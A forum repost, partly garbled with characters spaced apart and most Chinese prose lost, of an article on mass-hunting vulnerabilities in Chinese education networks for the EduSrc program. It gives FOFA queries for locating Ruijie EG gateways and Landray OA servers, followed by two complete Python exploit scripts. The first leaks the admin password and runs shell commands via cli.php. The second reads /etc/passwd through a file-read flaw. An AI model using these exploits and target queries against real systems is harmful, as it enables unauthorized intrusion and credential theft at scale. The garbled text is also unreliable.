[7591] 2021-05-04_配合文库漏洞实现EduSrc批量挖掘

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-17
2021-05-04_配合文库漏洞实现EduSrc批量挖掘     E d u S r c   F 1 2 s e c   2 0 2 1 - 0 5 - 0 4   P e i Q i P e i Q i   P e i Q i 广 广 S R C E d u S r c :     使 使 P e i Q i   . O r g F O F A :     o r g = " C h i n a   E d u c a t i o n   a n d   R e s e a r c h   N e t w o r k   C e n t e r "
F O F A E d u F O F A S R C F O F A E d u S r c   F O F A   a p p = " R u i j i e - E G " a p p = " R u i j i e - E G "   & &   o r g = " C h i n a   E d u c a t i o n   a n d   R e s e a r c h   N e t w o r k   C e n t e r "
使 使 P O C F O F A o r g E d u h t t p : / / i p . t o o l . c h i n a z . c o m /
O A   O A   F O F A h t t p s : / / m p . w e i x i n . q q . c o m / s / T k U Z X K g f E O V q o H K B r 3 k N d w a p p = " L a n d r a y - O A "   & &   o r g = " C h i n a   E d u c a t i o n   a n d   R e s e a r c h   N e t w o r k   C e n t e r "
使 使 E X P
)   :             线 线 h t t p : / / w i k i . p e i q i . t e c h         G i t h u b h t t p s : / / g i t h u b . c o m / P e i Q i 0 / P e i Q i - W I K I - P O C ~ G i t h u b E d u S r c ~ :     E X P #   E G   c l i . p h p   R C E
# ! / u s r / b i n / p y t h o n 3 # - * -   c o d i n g : u t f - 8   - * - #   a u t h o r   :   P e i Q i #   f r o m       :   h t t p : / / w i k i . p e i q i . t e c h i m p o r t   b a s e 6 4 i m p o r t   r e q u e s t s i m p o r t   r a n d o m i m p o r t   r e i m p o r t   j s o n i m p o r t   s y s f r o m   r e q u e s t s . p a c k a g e s . u r l l i b 3 . e x c e p t i o n s   i m p o r t   I n s e c u r e R e q u e s t W a r n i n g d e f   t i t l e ( ) :         p r i n t ( ' + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ' )         p r i n t ( ' +     0 3 3 [ 3 4 m P O C _ D e s :   h t t p : / / w i k i . p e i q i . t e c h                                                                       0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 4 m G i t h u b   :   h t t p s : / / g i t h u b . c o m / P e i Q i 0                                                                   0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 4 m     :   P e i Q i                                                                                                       0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 4 m V e r s i o n :   E G   c l i . p h p   R C E                                                                             0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 6 m 使 :     p y t h o n 3   p o c . p y                                                                                         0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 6 m U r l                   > > >   h t t p : / / x x x . x x x . x x x . x x x                                                           0 3 3 [ 0 m ' )         p r i n t ( ' + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ' ) d e f   P O C _ 1 ( t a r g e t _ u r l ) :         v u l n _ u r l   =   t a r g e t _ u r l   +   " / l o g i n . p h p "         h e a d e r s   =   {                                 " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 6 . 0 . 4 2 4 0 . 1 1 1   S a f a r i / 5 3 7 . 3 6 " ,                                 " C o n t e n t - T y p e " :   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "         }         d a t a   =   ' u s e r n a m e = a d m i n & p a s s w o r d = a d m i n ? s h o w + w e b m a s t e r + u s e r '         t r y :                 r e q u e s t s . p a c k a g e s . u r l l i b 3 . d i s a b l e _ w a r n i n g s ( I n s e c u r e R e q u e s t W a r n i n g )                 r e s p o n s e   =   r e q u e s t s . p o s t ( u r l = v u l n _ u r l ,   d a t a = d a t a ,   h e a d e r s = h e a d e r s ,   v e r i f y = F a l s e ,   t i m e o u t = 1 0 )                 p r i n t ( " 0 3 3 [ 3 6 m [ o ]     s h o w   w e b m a s t e r   u s e r   0 3 3 [ 0 m " . f o r m a t ( t a r g e t _ u r l ) )                 i f   " d a t a "   i n   r e s p o n s e . t e x t   a n d   r e s p o n s e . s t a t u s _ c o d e   = =   2 0 0 :                         p a s s w o r d   =   r e . f i n d a l l ( r ' a d m i n   ( . * ? ) " ' ,   r e s p o n s e . t e x t ) [ 0 ]                         p r i n t ( " 0 3 3 [ 3 6 m [ o ]   ,   :     a d m i n       { }   0 3 3 [ 0 m " . f o r m a t ( p a s s w o r d ) )                         P O C _ 2 ( t a r g e t _ u r l ,   p a s s w o r d )         e x c e p t   E x c e p t i o n   a s   e :                 p r i n t ( " 0 3 3 [ 3 1 m [ x ]   : { }   0 3 3 [ 0 m " . f o r m a t ( e ) )                 s y s . e x i t ( 0 ) d e f   P O C _ 2 ( t a r g e t _ u r l ,   p a s s w o r d ) :         v u l n _ u r l   =   t a r g e t _ u r l   +   " / l o g i n . p h p "         h e a d e r s   =   {                                 " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 6 . 0 . 4 2 4 0 . 1 1 1   S a f a r i / 5 3 7 . 3 6 " ,                                 " C o n t e n t - T y p e " :   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "         }         d a t a   =   ' u s e r n a m e = a d m i n & p a s s w o r d = { } ' . f o r m a t ( p a s s w o r d )         t r y :                 r e q u e s t s . p a c k a g e s . u r l l i b 3 . d i s a b l e _ w a r n i n g s ( I n s e c u r e R e q u e s t W a r n i n g )                 r e s p o n s e   =   r e q u e s t s . p o s t ( u r l = v u l n _ u r l ,   d a t a = d a t a ,   h e a d e r s = h e a d e r s ,   v e r i f y = F a l s e ,   t i m e o u t = 1 0 )                 p r i n t ( " 0 3 3 [ 3 6 m [ o ]   . . . . .   0 3 3 [ 0 m " . f o r m a t ( t a r g e t _ u r l ) )                 i f   " s t a t u s "   i n   r e s p o n s e . t e x t   a n d   " 1 "   i n   r e s p o n s e . t e x t   a n d   r e s p o n s e . s t a t u s _ c o d e   = =   2 0 0 :                         r u i j i e _ c o o k i e   =   " R U I J I E I D = "   +   r e . f i n d a l l ( r " ' S e t - C o o k i e ' :   ' R U I J I E I D = ( . * ? ) ; " ,   s t r ( r e s p o n s e . h e a d e r s ) ) [ 0 ]   +   " ; u s e r = a d m i n ; "                         p r i n t ( " 0 3 3 [ 3 6 m [ o ]   C o o k i e :   { }   0 3 3 [ 0 m " . f o r m a t ( r u i j i e _ c o o k i e ) )                         P O C _ 3 ( t a r g e t _ u r l ,   r u i j i e _ c o o k i e )         e x c e p t   E x c e p t i o n   a s   e :                 p r i n t ( " 0 3 3 [ 3 1 m [ x ]   : { }   0 3 3 [ 0 m " . f o r m a t ( e ) )                 s y s . e x i t ( 0 ) d e f   P O C _ 3 ( t a r g e t _ u r l ,   r u i j i e _ c o o k i e ) :         v u l n _ u r l   =   t a r g e t _ u r l   +   " / c l i . p h p ? a = s h e l l "         h e a d e r s   =   {                                 " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 6 . 0 . 4 2 4 0 . 1 1 1   S a f a r i / 5 3 7 . 3 6 " ,                                 " C o n t e n t - T y p e " :   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d " ,                                 " C o o k i e " :   " { } " . f o r m a t ( r u i j i e _ c o o k i e )         }
        d a t a   =   ' n o t d e l a y = t r u e & c o m m a n d = c a t   / e t c / p a s s w d '         t r y :                 r e s p o n s e   =   r e q u e s t s . p o s t ( u r l = v u l n _ u r l ,   d a t a = d a t a ,   h e a d e r s = h e a d e r s ,   v e r i f y = F a l s e ,   t i m e o u t = 1 0 )                 p r i n t ( " 0 3 3 [ 3 6 m [ o ]     c a t   / e t c / p a s s w d . . . . .   0 3 3 [ 0 m " . f o r m a t ( t a r g e t _ u r l ) )                 i f   " r o o t : "   i n   r e s p o n s e . t e x t   a n d   r e s p o n s e . s t a t u s _ c o d e   = =   2 0 0 :                         p r i n t ( " 0 3 3 [ 3 6 m [ o ]     / e t c / p a s s w d   n [ o ]   : { }   0 3 3 [ 0 m " . f o r m a t ( r e s p o n s e . t e x t ) )         e x c e p t   E x c e p t i o n   a s   e :                 p r i n t ( " 0 3 3 [ 3 1 m [ x ]   : { }   0 3 3 [ 0 m " . f o r m a t ( e ) )                 s y s . e x i t ( 0 ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         t i t l e ( )         t a r g e t _ u r l   =   s t r ( i n p u t ( " 0 3 3 [ 3 5 m P l e a s e   i n p u t   A t t a c k   U r l n U r l       > > >   0 3 3 [ 0 m " ) )         P O C _ 1 ( t a r g e t _ u r l ) #   O A   # ! / u s r / b i n / p y t h o n 3 # - * -   c o d i n g : u t f - 8   - * - #   a u t h o r   :   P e i Q i #   f r o m       :   h t t p : / / w i k i . p e i q i . t e c h i m p o r t   b a s e 6 4 i m p o r t   r e q u e s t s i m p o r t   r a n d o m i m p o r t   r e i m p o r t   j s o n i m p o r t   s y s f r o m   r e q u e s t s . p a c k a g e s . u r l l i b 3 . e x c e p t i o n s   i m p o r t   I n s e c u r e R e q u e s t W a r n i n g d e f   t i t l e ( ) :         p r i n t ( ' + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ' )         p r i n t ( ' +     0 3 3 [ 3 4 m P O C _ D e s :   h t t p : / / w i k i . p e i q i . t e c h                                                                       0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 4 m G i t h u b   :   h t t p s : / / g i t h u b . c o m / P e i Q i 0                                                                   0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 4 m     :   P e i Q i                                                                                                       0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 4 m V e r s i o n :   O A                                                                                       0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 6 m 使 :     p y t h o n 3   p o c . p y                                                                                         0 3 3 [ 0 m ' )         p r i n t ( ' +     0 3 3 [ 3 6 m U r l                   > > >   h t t p : / / x x x . x x x . x x x . x x x                                                           0 3 3 [ 0 m ' )         p r i n t ( ' + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ' ) d e f   P O C _ 1 ( t a r g e t _ u r l ) :         v u l n _ u r l   =   t a r g e t _ u r l   +   " / s y s / u i / e x t e n d / v a r k i n d / c u s t o m . j s p "         h e a d e r s   =   {                                 " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 6 . 0 . 4 2 4 0 . 1 1 1   S a f a r i / 5 3 7 . 3 6 " ,                                 " C o n t e n t - T y p e " :   " a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d "         }         d a t a   =   ' v a r = { " b o d y " : { " f i l e " : " f i l e : / / / e t c / p a s s w d " } } '         t r y :                 r e q u e s t s . p a c k a g e s . u r l l i b 3 . d i s a b l e _ w a r n i n g s ( I n s e c u r e R e q u e s t W a r n i n g )                 r e s p o n s e   =   r e q u e s t s . p o s t ( u r l = v u l n _ u r l ,   d a t a = d a t a ,   h e a d e r s = h e a d e r s ,   v e r i f y = F a l s e ,   t i m e o u t = 1 0 )                 p r i n t ( " 0 3 3 [ 3 6 m [ o ]     { } / s y s / u i / e x t e n d / v a r k i n d / c u s t o m . j s p   0 3 3 [ 0 m " . f o r m a t ( t a r g e t _ u r l ) )                 i f   " r o o t : "   i n   r e s p o n s e . t e x t   a n d   r e s p o n s e . s t a t u s _ c o d e   = =   2 0 0 :                         p r i n t ( " 0 3 3 [ 3 6 m [ o ]     / e t c / p a s s w d   n [ o ]   : { }   0 3 3 [ 0 m " . f o r m a t ( r e s p o n s e . t e x t ) )         e x c e p t   E x c e p t i o n   a s   e :                 p r i n t ( " 0 3 3 [ 3 1 m [ x ]   : { }   0 3 3 [ 0 m " . f o r m a t ( e ) )                 s y s . e x i t ( 0 ) # i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         t i t l e ( )         t a r g e t _ u r l   =   s t r ( i n p u t ( " 0 3 3 [ 3 5 m P l e a s e   i n p u t   A t t a c k   U r l n U r l       > > >   0 3 3 [ 0 m " ) )         P O C _ 1 ( t a r g e t _ u r l )
使 使 P e i Q i  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则